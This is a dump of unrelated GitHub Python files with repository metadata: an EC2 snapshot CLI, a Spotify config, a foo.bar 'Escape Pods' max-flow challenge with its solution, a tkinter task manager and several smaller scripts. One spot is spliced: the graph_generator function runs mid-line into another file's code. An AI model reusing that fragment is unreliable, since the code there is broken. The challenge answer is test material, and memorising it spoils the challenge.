instances = ec2.instances.filter(Filters=filters)\n else:\n instances = ec2.instances.all()\n \n return instances\n \n\ndef has_pending_snapshot(volume):\n snapshots = list(volume.snapshots.all())\n return snapshots and snapshots[0].state == 'pending'\n\n \n# Fxns for CLI cmd args \n@click.group()\ndef cli():\n \"\"\"Manages instances and volumes\"\"\"\n\n# Snapshots management\n@cli.group('snapshots')\ndef snapshots():\n \"\"\"Commands for snapshots\"\"\"\n \n@snapshots.command('list') \n@click.option('--project', default=None, help=\"Only snapshots for project tag Name \")\ndef list_snapshots(project):\n \"List EC2 volume snapshots\"\n \n instances = filter_instances(project)\n for i in instances:\n for v in i.volumes.all():\n for s in v.snapshots.all():\n print(', '.join((v.id, i.id, s.id, s.description, s.state)))\n \n # only show most recent successful snapshot\n if s.state == 'completed': break\n\n return\n \n\n# Volumes management\n@cli.group('volumes')\ndef volumes():\n \"\"\"Commands for volumes\"\"\"\n \n@volumes.command('list') \n@click.option('--project', default=None, help=\"Only volumes for project tag Name \")\ndef list_volumes(project):\n \"List EC2 volumes\"\n \n instances = filter_instances(project)\n for i in instances:\n for v in i.volumes.all():\n print(', '.join((v.id, v.state, i.id, str(v.size))))\n\n return\n\n\n\n# Instances management\n@cli.group('instances')\ndef instances():\n \"\"\"Commands for instances\"\"\"\n\n\n@instances.command('list') \n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef list_instances(project):\n \"List EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n tags = { t['Key']: t['Value'] for t in i.tags or [] }\n print (', '.join((i.id, i.instance_type, i.placement['AvailabilityZone'], i.state['Name'], i.public_dns_name, str(i.public_ip_address), tags.get('Name', ''))))\n\n\n@instances.command('snapshot') \n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef create_snapshot_instances(project):\n \"Snapshot of EC2 instance volumes\"\n \n instances = filter_instances(project)\n \n for i in instances:\n \n # first stop instances before doing snapshot\n print(\"Stopping instance {0}\".format(i.id))\n i.stop()\n i.wait_until_stopped()\n \n for v in i.volumes.all():\n if has_pending_snapshot(v):\n print (\"Cant do snapshot presently...{0}\".format(v.id))\n \n print (\"Creating snapshot of {0}\".format(v.id))\n v.create_snapshot(Description=\"Snapshot created by ec2_aws.py\")\n \n # start instances post snapshot\n print(\"Restarting instance {0}\".format(i.id))\n i.start()\n i.wait_until_running()\n \n print(\"Snapshots complete\")\n \n return\n\n\n@instances.command('stop')\n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef stop_instances(project):\n \"Stop EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n print (\"Stopping...{0}\".format(i.id))\n try:\n i.stop()\n except botocore.exceptions.ClientError as e:\n print(\"Could not stop {0}. \".format(i.id) + str(e))\n \n return\n\n\n@instances.command('start')\n@click.option('--project', default=None, help=\"Only instances for project tag Name \")\ndef start_instances(project):\n \"Start EC2 instances\"\n \n instances = filter_instances(project)\n \n for i in instances:\n print (\"Starting...{0}\".format(i.id))\n try:\n i.start()\n except botocore.exceptions.ClientError as e:\n print(\"Could not start {0}. \".format(i.id) + str(e))\n \n return\n\n\n\n#session = boto3.Session(profile_name='shotty')\nif __name__ == '__main__':\n cli()\n\n \n ","repo_name":"alancam73/py-ec2-aws","sub_path":"shotty/ec2_aws.py","file_name":"ec2_aws.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23279839733","text":"import os\n\nSPOTIFY_AUTH_URL = \"https://accounts.spotify.com/authorize\"\nSPOTIFY_TOKEN_URL = \"https://accounts.spotify.com/api/token\"\nSPOTIFY_API_URL = \"https://api.spotify.com/v1\"\nREDIRECT_URI = \"http://127.0.0.1:5000/callback/\"\nSCOPE = \"user-top-read user-read-currently-playing\"\nCLIENT_ID = 'Enter Client ID'\nCLIENT_SECRET = 'Enter Secret ID'\nAUTH_QUERY_PARAMETERS = {\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"scope\": SCOPE,\n \"client_id\": CLIENT_ID,\n}","repo_name":"wesngu28/searchify-flask","sub_path":"spotifyinfo/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34253245443","text":"\"\"\"\nEscape Pods\n===========\n\nYou've blown up the LAMBCHOP doomsday device and broken the bunnies out of Lambda's prison - and now you need to escape from the space station as quickly and as orderly as possible! The bunnies have all gathered in various locations throughout the station, and need to make their way towards the seemingly endless amount of escape pods positioned in other parts of the station. You need to get the numerous bunnies through the various rooms to the escape pods. Unfortunately, the corridors between the rooms can only fit so many bunnies at a time. What's more, many of the corridors were resized to accommodate the LAMBCHOP, so they vary in how many bunnies can move through them at a time.\n\nGiven the starting room numbers of the groups of bunnies, the room numbers of the escape pods, and how many bunnies can fit through at a time in each direction of every corridor in between, figure out how many bunnies can safely make it to the escape pods at a time at peak.\n\nWrite a function solution(entrances, exits, path) that takes an array of integers denoting where the groups of gathered bunnies are, an array of integers denoting where the escape pods are located, and an array of an array of integers of the corridors, returning the total number of bunnies that can get through at each time step as an int. The entrances and exits are disjoint and thus will never overlap. The path element path[A][B] = C describes that the corridor going from A to B can fit C bunnies at each time step. There are at most 50 rooms connected by the corridors and at most 2000000 bunnies that will fit at a time.\n\nFor example, if you have:\nentrances = [0, 1]\nexits = [4, 5]\npath = [\n [0, 0, 4, 6, 0, 0], # Room 0: Bunnies\n [0, 0, 5, 2, 0, 0], # Room 1: Bunnies\n [0, 0, 0, 0, 4, 4], # Room 2: Intermediate room\n [0, 0, 0, 0, 6, 6], # Room 3: Intermediate room\n [0, 0, 0, 0, 0, 0], # Room 4: Escape pods\n [0, 0, 0, 0, 0, 0], # Room 5: Escape pods\n]\n\nThen in each time step, the following might happen:\n0 sends 4/4 bunnies to 2 and 6/6 bunnies to 3\n1 sends 4/5 bunnies to 2 and 2/2 bunnies to 3\n2 sends 4/4 bunnies to 4 and 4/4 bunnies to 5\n3 sends 4/6 bunnies to 4 and 4/6 bunnies to 5\n\nSo, in total, 16 bunnies could make it to the escape pods at 4 and 5 at each time step. (Note that in this example, room 3 could have sent any variation of 8 bunnies to 4 and 5, such as 2/6\nand 6/6, but the final solution remains the same.)\n\nTest cases\n==========\nYour code should pass the following test cases.\nNote that it may also be run against hidden test cases not shown here.\n\n-- Python cases --\nInput:\nsolution.solution([0], [3], [[0, 7, 0, 0], [0, 0, 6, 0], [0, 0, 0, 8], [9, 0, 0, 0]])\nOutput:\n 6\n\nInput:\nsolution.solution([0, 1], [4, 5], [[0, 0, 4, 6, 0, 0], [0, 0, 5, 2, 0, 0], [0, 0, 0, 0, 4, 4], [0, 0, 0, 0, 6, 6], [0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0]])\nOutput:\n 16\n\"\"\"\ndef solution(entrances, exits, paths):\n \"\"\"\n \"\"\"\n total_flow = 0\n remaining = paths[:]\n\n prev_flow = -1\n\n while prev_flow != total_flow:\n prev_flow = total_flow\n\n for j in entrances:\n node = j\n visited = []\n path = []\n while True:\n # if node is an exit find the bottleneck flow through the path and update the remaining capacity\n if node in exits:\n path.append(node)\n bottleneck = 2000001\n for ind in range(len(path)-1):\n bottleneck = min(remaining[path[ind]][path[ind+1]], bottleneck)\n total_flow += bottleneck\n for ind in range(len(path)-1):\n remaining[path[ind]][path[ind+1]] -= bottleneck\n remaining[path[ind+1]][path[ind]] += bottleneck\n break\n\n found = False\n visited.append(node)\n # let's get greedy\n maximum = 0\n index = 0\n for ind, val in enumerate(remaining[node]):\n if ind not in visited and val>maximum:\n maximum = val\n index = ind\n found = True\n\n # if theres an unvisited neighbour, append path with current node and set the next node to expore\n if found:\n path.append(node)\n node = index\n # else, if theres no unexplored neighbour and the path is empty then there is no path from this source\n elif not path:\n break\n # else, backtrack\n else:\n node = path.pop()\n\n return total_flow\n","repo_name":"Shiakaron/foo.bar","sub_path":"level4_part2.py","file_name":"level4_part2.py","file_ext":"py","file_size_in_byte":4735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41624219304","text":"from data_prueba import lista_bzrp\n\ndef generar_csv(nombre_archivo : str, lista : list[dict]):\n '''\n Genera un archivo csv a partir de una lista de ddionarios\n Recibe: el path/nombre_archivo.csv. (Donde se va a guardar)\n Devuelve: no aplica\n '''\n with open(nombre_archivo, \"w\") as archivo: # \"w\" es ecritura\n for video in lista:\n # print(video)\n texto_mensaje = \"{0},{1}\\n\".format(video[\"title\"], video[\"views\"]) #hay que darle separacion con coma y al final salto de linea \\n (alt +92 n)\n archivo.write(texto_mensaje)\n\npath_archivo = \"9-Ejercicios-Trabajar_con_archivos_json_y_csv -GUIA-f\\mi_data_prueba.csv\"\ngenerar_csv(path_archivo, lista_bzrp)","repo_name":"HoracioxBarrios/programacion_1_python","sub_path":"9-Ejercicios-Trabajar_con_archivos_json_y_csv -GUIA-f/3_generar_csv_desde_una_list_dicc.py","file_name":"3_generar_csv_desde_una_list_dicc.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33773182664","text":"import heapq\n\ndef solution(n, works):\n answer = 0\n \n # 최대 힙으로 변환\n works = [-work for work in works]\n heapq.heapify(works)\n \n # N시간 동안 야근을 하면서 작업량을 최소화\n for _ in range(n):\n if works:\n max_work = -heapq.heappop(works) # 가장 많은 작업량을 가진 작업을 꺼냄\n if max_work > 1:\n heapq.heappush(works, -(max_work - 1)) # 작업량을 1 줄인 후 다시 힙에 추가\n \n # 야근 피로도 계산\n for work in works:\n answer += work ** 2\n \n return answer","repo_name":"fkstndnjs/CodingTest","sub_path":"lv3/ex15.py","file_name":"ex15.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70518343529","text":"import torch \nfrom torch import nn\nimport numpy as np\nimport scipy.sparse as sp\nfrom sklearn.metrics.pairwise import cosine_similarity\ndef graph_generator(features):\n # features=features.cpu().detach().numpy()\n thea=0.4\n batch,r,c=features.shape\n adj=torch.zeros((batch,r,r))\n cosine=np.zeros((r,r))\n for i in range(batch):\n adj_batch=cosine_similarity(features[i,:,:])\n adj_mean=np.mean(adj_batch,axis=0)\n adj_mean_m=np.repeat(adj_mean,r,axis=0).reshape((r,r))\n for m in range(r):\n for n in range(r):\n if adj_batch[m][n]>=adj_mean_m[m][n]:\n cosine[m][n]=1\n elif thea float:\n '''\n compute_mse():\n Computes the Mean Squared Error (MSE) between the original and recomposed tensors.\n\n Args:\n original (np.ndarray): The original tensor.\n recomposed (np.ndarray): The recomposed tensor.\n\n Returns:\n float: The MSE between the original and recomposed tensors.\n '''\n mse = np.mean((original - recomposed) ** 2)\n return mse\n\ndef part3() -> tuple[str, str]:\n _x11 = np.array([\n [4, 2, 6],\n [5, 2, 9],\n [6, 7, 2]\n ])\n\n _x12 = np.array([\n [4, 5, 8],\n [7, 3, 6],\n [2, 4, 9]\n ])\n\n _x21 = np.array([\n [4, 3, 6],\n [8, 4, 1],\n [4, 2, 9]\n ])\n\n _x22 = np.array([\n [5, 1, 8],\n [8, 3, 6],\n [3, 5, 1]\n ])\n\n _x31 = np.array([\n [6, 3, 8],\n [0, 4, 5],\n [3, 2, 7]\n ])\n\n _x32 = np.array([\n [9, 3, 5],\n [7, 2, 0],\n [4, 2, 9]\n ])\n\n tensor = np.array([\n [_x11, _x12],\n [_x21, _x22],\n [_x31, _x32]\n ])\n\n # Tucker\n tucker_core, tucker_factors = tucker(\n tensor,\n rank = [2, 2, 2, 2]\n )\n\n tucker_tensor_recomposition = tucker_to_tensor(\n tucker_tensor = (\n tucker_core,\n tucker_factors\n )\n )\n\n tucker_mse = compute_mse(tensor, tucker_tensor_recomposition)\n\n mean_square_error_tucker_text = fr'The mean-square error for Tucker decomposition is: {tucker_mse}.'\n\n # CP\n parafac_factors = parafac(tensor, rank = 2)\n\n parafac_tensor_recomposition = kruskal_to_tensor(parafac_factors)\n parafac_mse = compute_mse(tensor, parafac_tensor_recomposition)\n\n mean_square_error_cp_text = fr'The mean-square error for CP decomposition is: {parafac_mse}'\n\n return (mean_square_error_tucker_text, mean_square_error_cp_text)","repo_name":"Delpen9/tensor-analysis-experiments","sub_path":"problem1/part3.py","file_name":"part3.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19175765852","text":"import unittest\n\nfrom lbry.wallet.bcd_data_stream import BCDataStream\n\n\nclass TestBCDataStream(unittest.TestCase):\n\n def test_write_read(self):\n s = BCDataStream()\n s.write_string(b'a'*252)\n s.write_string(b'b'*254)\n s.write_string(b'c'*(0xFFFF + 1))\n # s.write_string(b'd'*(0xFFFFFFFF + 1))\n s.write_boolean(True)\n s.write_boolean(False)\n s.reset()\n\n self.assertEqual(s.read_string(), b'a'*252)\n self.assertEqual(s.read_string(), b'b'*254)\n self.assertEqual(s.read_string(), b'c'*(0xFFFF + 1))\n # self.assertEqual(s.read_string(), b'd'*(0xFFFFFFFF + 1))\n self.assertTrue(s.read_boolean())\n self.assertFalse(s.read_boolean())\n","repo_name":"lbryio/lbry-sdk","sub_path":"tests/unit/wallet/test_bcd_data_stream.py","file_name":"test_bcd_data_stream.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":7218,"dataset":"github-code","pt":"53"} +{"seq_id":"2158051091","text":"# Header\n\n\"\"\"\nWeek 2 Review - Part 2\nWyatt Castaneda\nSWDV 600: INTRO TO PROGRAMMING\n\"\"\"\n\n# Problem \n\n\"\"\"\nA franchise restaurant is attempting to understand if customers think their service is good day-to-day by summarizing a series of daily scores. The restaurant computes a daily score based on the number of positive comments and negative comments it receives that day. Each the score begins at 0. A positive comment adds 1 to the score, and a negative comment subtracts 1. So on a given day if there were 5 positive comments and 2 negative comments, the score for that day would be 3 (5 - 2).\n\nYour task is to write a program that enables a restaurant manager to input these daily scores and report the total score for those days. For example, if the score on Monday is 3, Tuesday is 4, Wednesday is -2, and Thursday is 3, then the total score for those days would be 3 + 4 + (-2) + 3, which is 8. This would indicate the service is being positively reviewed over the past few days.\n\nYou program should prompt the user for how many days of scores they will be entering, and then prompt them for the score for each day. The score prompt should include the number of the day for which they entering a score (i.e., notice the `day 1` phrase in the prompt of the example below).\n\nOnce all the scores have been entered, it should then output the number total score for those days. \n\"\"\"\n\n# Given \n\n\"\"\"\nHow many days of scores? 4\nEnter score for day 1: 2\nEnter score for day 2: 4\nEnter score for day 3: -2\nEnter score for day 4: 1\nThe total score of the 4 days is 5\n\"\"\"\n\n# Solution\n\nimport math\n\nprint()\ninputNumDays = int(input(\"How many days of scores would you like to enter? \"))\nprint()\n\ndef promptUserToEnterDailyScores(numberOfDays):\n result = 0\n\n for day in range(numberOfDays):\n result = result + int(input(f'Enter the score for day {day + 1}: '))\n \n return result\n\nfinalScore = promptUserToEnterDailyScores(inputNumDays)\n\nprint()\nprint(f'The total score of the {inputNumDays} days is {finalScore}.')\n","repo_name":"WyattCast44/intro-to-programming","sub_path":"week-2/total_service_score.py","file_name":"total_service_score.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36453571249","text":"import sqlite3\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkcalendar import Calendar\r\nimport datetime\r\n\r\n\r\nchosen_date = None\r\nchosen_deadline = None\r\n\r\ndef delegated_tasks_list():\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n\r\n delegated_tasks_list_win = tk.Tk()\r\n delegated_tasks_list_win.geometry('1000x400')\r\n delegated_tasks_list_win.title('Time Management System 1.1.: DELEGATED TASKS DATABASE')\r\n delegated_tasks_list_win.option_add('*Dialog.msg.title.bg', '#000000')\r\n\r\n canvas = tk.Canvas(delegated_tasks_list_win)\r\n canvas.pack(side='left', fill='both', expand=True)\r\n\r\n scrollbar = ttk.Scrollbar(delegated_tasks_list_win, orient='vertical', command=canvas.yview)\r\n scrollbar.pack(side='right', fill='y')\r\n\r\n canvas.configure(yscrollcommand=scrollbar.set)\r\n canvas.bind('', lambda e: canvas.configure(scrollregion=canvas.bbox('all')))\r\n\r\n frame = tk.Frame(canvas)\r\n canvas.create_window((0, 0), window=frame, anchor='nw')\r\n\r\n treeview = ttk.Treeview(frame, columns=('Task ID', 'Task', 'Keywords', 'Expected Result', 'Date', 'Deadline', 'Delegated to', 'Cooperating with'))\r\n\r\n treeview.heading('#0', text='ID')\r\n treeview.column('#0', width=0, stretch = False)\r\n treeview.heading('Task ID', text='Task ID')\r\n treeview.column('Task ID', width=100)\r\n treeview.heading('Task', text='Task')\r\n treeview.column('Task', width=200)\r\n treeview.heading('Keywords', text='Keywords')\r\n treeview.column('Keywords', width=100)\r\n treeview.heading('Expected Result', text='Expected Result')\r\n treeview.column('Expected Result', width=200)\r\n treeview.heading('Date', text='Date')\r\n treeview.column('Date', width=100)\r\n treeview.heading('Deadline', text='Deadline')\r\n treeview.column('Deadline', width=100)\r\n treeview.heading('Delegated to', text='Delegated to')\r\n treeview.column('Delegated to', width=120)\r\n treeview.heading('Cooperating with', text='Cooperating with')\r\n treeview.column('Cooperating with', width=120)\r\n\r\n cursor.execute('SELECT * FROM delegated_tasks')\r\n for row in cursor.fetchall():\r\n treeview.insert('', 'end', text=row[0], values=row[1:])\r\n\r\n treeview.pack(fill='both', expand=True)\r\n\r\n def compare_dates(item1, item2):\r\n date1 = datetime.datetime.strptime(treeview.item(item1)['values'][0], \"%d/%m/%Y\")\r\n date2 = datetime.datetime.strptime(treeview.item(item2)['values'][0], \"%d/%m/%Y\")\r\n if date1 < date2:\r\n return -1\r\n elif date1 == date2:\r\n return 0\r\n else:\r\n return 1\r\n\r\n\r\n def see_task_in_tasks_list():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()\r\n if selection:\r\n pass\r\n else:\r\n messagebox.showerror(\"Error\", \"No task selected. Please select a task to see its details.\")\r\n return\r\n\r\n see_task_win = tk.Toplevel()\r\n see_task_win.geometry (\"600x400\")\r\n see_task_win.title(\"TASK VIEW\")\r\n see_task_win.resizable(0,0)\r\n see_task_win.configure(bg = \"#212121\")\r\n \r\n cal = Calendar (see_task_win, selectmode = 'day', date_pattern = ('dd/mm/yyyy'), background = \"black\")\r\n cal.place(x= 330, y= 160)\r\n\r\n def choose_date():\r\n global chosen_date\r\n\r\n chosen_date = cal.get_date()\r\n chosen_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#2F3030\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_date_label.place(x = 180, y = 5)\r\n \r\n def choose_deadline():\r\n global chosen_deadline\r\n\r\n chosen_deadline = cal.get_date()\r\n chosen_deadline_label = tk.Label(\r\n middle_frame,\r\n text = chosen_deadline,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n chosen_deadline_label.place(x = 180, y = 45)\r\n \r\n def exit_see_task():\r\n if len(task_description_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else: \r\n pass\r\n elif len(keywords_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n elif len(expected_result_row.get()) != 0:\r\n answer = messagebox.askyesno(\"Close\", \"All changes will be lost. Continue?\")\r\n if answer:\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n else:\r\n see_task_win.destroy()\r\n\r\n def edit_task():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()[0]\r\n if selection:\r\n task_name = treeview.item(selection, 'values')[1]\r\n else:\r\n messagebox.showerror(\"Error\", \"No task selected. Please select a task to see its details.\")\r\n \r\n if chosen_date is None and chosen_deadline is not None:\r\n chosen_date = chosen_deadline\r\n elif chosen_date is not None and chosen_deadline is not None:\r\n chosen_date = min(chosen_date, chosen_deadline)\r\n elif chosen_date is not None and chosen_deadline is None:\r\n chosen_deadline = chosen_date\r\n \r\n answer = messagebox.askyesno(\"Edit Task\", \"Do you wish to edit task?\")\r\n if answer:\r\n try:\r\n if len(delegate_to_row.get()) != 0:\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n cursor.execute(f\"SELECT id FROM delegated_tasks WHERE task_or_action = '{task_name}'\")\r\n row = cursor.fetchone()\r\n row_id = row[0]\r\n cursor.execute(\"DELETE FROM delegated_tasks WHERE id = ?\", (row_id,))\r\n conn.commit()\r\n treeview.delete(treeview.selection())\r\n\r\n task_ID = None\r\n task_or_action = task_description_row.get()\r\n keywords = keywords_row.get()\r\n expected_result = expected_result_row.get()\r\n date = chosen_date\r\n deadline = chosen_deadline\r\n delegate_to = delegate_to_row.get()\r\n cooperate_with = cooperate_with_row.get()\r\n\r\n query = \"INSERT INTO delegated_tasks (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\r\n values = (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with)\r\n cursor.execute(query, values)\r\n\r\n conn.commit()\r\n messagebox.showinfo(\"Success\", \"Task successfully edited!\")\r\n cursor.close()\r\n conn.close()\r\n messagebox.showinfo(\"Success\", \"Task successfully edited!\")\r\n else:\r\n tasks_conn = sqlite3.connect('tasks.db')\r\n tasks_cursor = tasks_conn.cursor()\r\n delegated_conn = sqlite3.connect('delegated_tasks.db')\r\n delegated_cursor = delegated_conn.cursor()\r\n \r\n delegated_cursor.execute(f\"SELECT id FROM delegated_tasks WHERE task_or_action = '{task_name}'\")\r\n row = delegated_cursor.fetchone()\r\n row_id = row[0]\r\n delegated_cursor.execute(\"DELETE FROM delegated_tasks WHERE id = ?\", (row_id,))\r\n delegated_conn.commit()\r\n treeview.delete(treeview.selection())\r\n delegated_conn.commit()\r\n delegated_cursor.close()\r\n delegated_conn.close()\r\n\r\n tasks_cursor.execute('CREATE TABLE IF NOT EXISTS tasks (id INTEGER PRIMARY KEY, task_ID TEXT, task_or_action TEXT, keywords TEXT, expected_result TEXT, date TEXT, deadline TEXT, delegate_to TEXT, cooperate_with TEXT)')\r\n task_ID = None\r\n task_or_action = task_description_row.get()\r\n keywords = keywords_row.get()\r\n expected_result = expected_result_row.get()\r\n date = chosen_date\r\n deadline = chosen_deadline\r\n delegate_to = delegate_to_row.get()\r\n cooperate_with = cooperate_with_row.get()\r\n query = \"INSERT INTO tasks (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with) VALUES (?, ?, ?, ?, ?, ?, ?, ?)\"\r\n values = (task_ID, task_or_action, keywords, expected_result, date, deadline, delegate_to, cooperate_with)\r\n tasks_cursor.execute(query, values)\r\n tasks_conn.commit()\r\n messagebox.showinfo(\"Success\", \"Task successfully saved into TASKS!\")\r\n tasks_cursor.close()\r\n tasks_conn.close()\r\n\r\n see_task_win.destroy()\r\n delegated_tasks_list_win.destroy()\r\n except Exception as e:\r\n messagebox.showerror(\"Error\", \"OOPS! \" + str(e))\r\n see_task_win.destroy()\r\n else:\r\n pass\r\n\r\n def insert_values():\r\n global chosen_date\r\n global chosen_deadline\r\n\r\n selection = treeview.selection()[0]\r\n task_name = treeview.item(selection, 'values')[1]\r\n\r\n conn = sqlite3.connect('delegated_tasks.db')\r\n cursor = conn.cursor()\r\n\r\n cursor.execute(\"SELECT id FROM delegated_tasks WHERE task_or_action=?\", (task_name,))\r\n row = cursor.fetchone()\r\n row_id = row[0]\r\n \r\n cursor.execute(\"SELECT task_or_action FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_task_or_action = cursor.fetchone()[0]\r\n task_description_row.insert(0, result_task_or_action)\r\n \r\n cursor.execute(\"SELECT keywords FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_keywords = cursor.fetchone()[0]\r\n keywords_row.insert(0, result_keywords)\r\n \r\n cursor.execute(\"SELECT expected_result FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_expected_result = cursor.fetchone()[0]\r\n expected_result_row.insert(0, result_expected_result)\r\n \r\n cursor.execute(\"SELECT date FROM delegated_tasks WHERE id=?\", (row_id,))\r\n chosen_date = cursor.fetchone()[0]\r\n result_date_label = tk.Label(\r\n middle_frame,\r\n text = chosen_date,\r\n font = ('Montserrat', '12'),\r\n background = \"#2F3030\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n result_date_label.place(x = 180, y = 5)\r\n\r\n cursor.execute(\"SELECT deadline FROM delegated_tasks WHERE id=?\", (row_id,))\r\n chosen_deadline = cursor.fetchone()[0]\r\n result_deadline_label = tk.Label(\r\n middle_frame,\r\n text = chosen_deadline,\r\n font = ('Montserrat', '12', 'bold'),\r\n background = \"#970000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n result_deadline_label.place(x = 180, y = 45)\r\n\r\n cursor.execute(\"SELECT delegate_to FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_delegate_to = cursor.fetchone()[0]\r\n delegate_to_row.insert(0, result_delegate_to)\r\n\r\n cursor.execute(\"SELECT cooperate_with FROM delegated_tasks WHERE id=?\", (row_id,))\r\n result_cooperate_with = cursor.fetchone()[0]\r\n cooperate_with_row.insert(0, result_cooperate_with)\r\n\r\n cursor.close()\r\n conn.close()\r\n\r\n\r\n header_label = tk.Label(\r\n see_task_win,\r\n text = \"TASK VIEW\",\r\n font = ('Montserrat', '15'),\r\n background = \"#212121\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n header_label.place(x = 250, y = 5)\r\n\r\n top_frame = tk.Frame(\r\n see_task_win,\r\n width = 570,\r\n height = 100,\r\n background = \"#2F3030\"\r\n )\r\n top_frame.place(x = 15, y = 40)\r\n\r\n task_description_label = tk.Label(\r\n top_frame,\r\n text = \"TASK OR ACTION\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n task_description_label.place(x = 10, y = 5)\r\n\r\n task_description_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n task_description_row.place(x = 150, y = 5)\r\n\r\n keywords_label = tk.Label(\r\n top_frame,\r\n text = \"Keywords\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n keywords_label.place(x = 10, y = 35)\r\n\r\n keywords_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n keywords_row.place(x = 150, y = 35)\r\n\r\n expected_result_label = tk.Label(\r\n top_frame,\r\n text = \"Expected Result\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n expected_result_label.place(x = 10, y = 65)\r\n\r\n expected_result_row = tk.Entry(\r\n top_frame,\r\n font = (\"Open Sans\", \"10\"),\r\n width = 56,\r\n insertbackground = \"#FFFFFF\",\r\n background = \"#000000\",\r\n foreground = \"#FFFFFF\"\r\n )\r\n expected_result_row.place(x = 150, y = 65)\r\n\r\n middle_frame = tk.Frame(\r\n see_task_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n middle_frame.place(x = 15, y = 160)\r\n\r\n date_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Date\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_date,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n date_button.place(x = 10, y = 5)\r\n\r\n deadline_button = tk.Button(\r\n middle_frame,\r\n text = \"Choose Deadline\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 16,\r\n command = choose_deadline,\r\n background = '#464646',\r\n foreground = '#FFFFFF'\r\n )\r\n deadline_button.place(x = 10, y = 45)\r\n\r\n\r\n edit_button = tk.Button(\r\n see_task_win,\r\n text = \"EDIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = edit_task,\r\n background = '#004C01',\r\n foreground = '#FFFFFF'\r\n )\r\n edit_button.place(x = 480, y = 360)\r\n\r\n exit_button = tk.Button(\r\n see_task_win,\r\n text = \"EXIT\",\r\n font = ('Arial', '10', 'bold'),\r\n width = 11,\r\n command = exit_see_task,\r\n background = '#970000',\r\n foreground = '#FFFFFF'\r\n )\r\n exit_button.place(x = 370, y = 360)\r\n\r\n bottom_frame = tk.Frame(\r\n see_task_win,\r\n width = 305,\r\n height = 80,\r\n background = \"#2F3030\"\r\n )\r\n bottom_frame.place(x = 15, y = 265)\r\n\r\n delegate_to_label = tk.Label(\r\n bottom_frame,\r\n text = \"Delegate to\",\r\n font = (\"Open Sans\", \"10\", \"bold\"),\r\n background = \"#2F3030\",\r\n foreground = \"#000000\"\r\n )\r\n delegate_to_label.place(x = 10, y = 5)\r\n\r\n delegate_to_row = tk.Entry(\r\n bottom_frame,\r\n font = 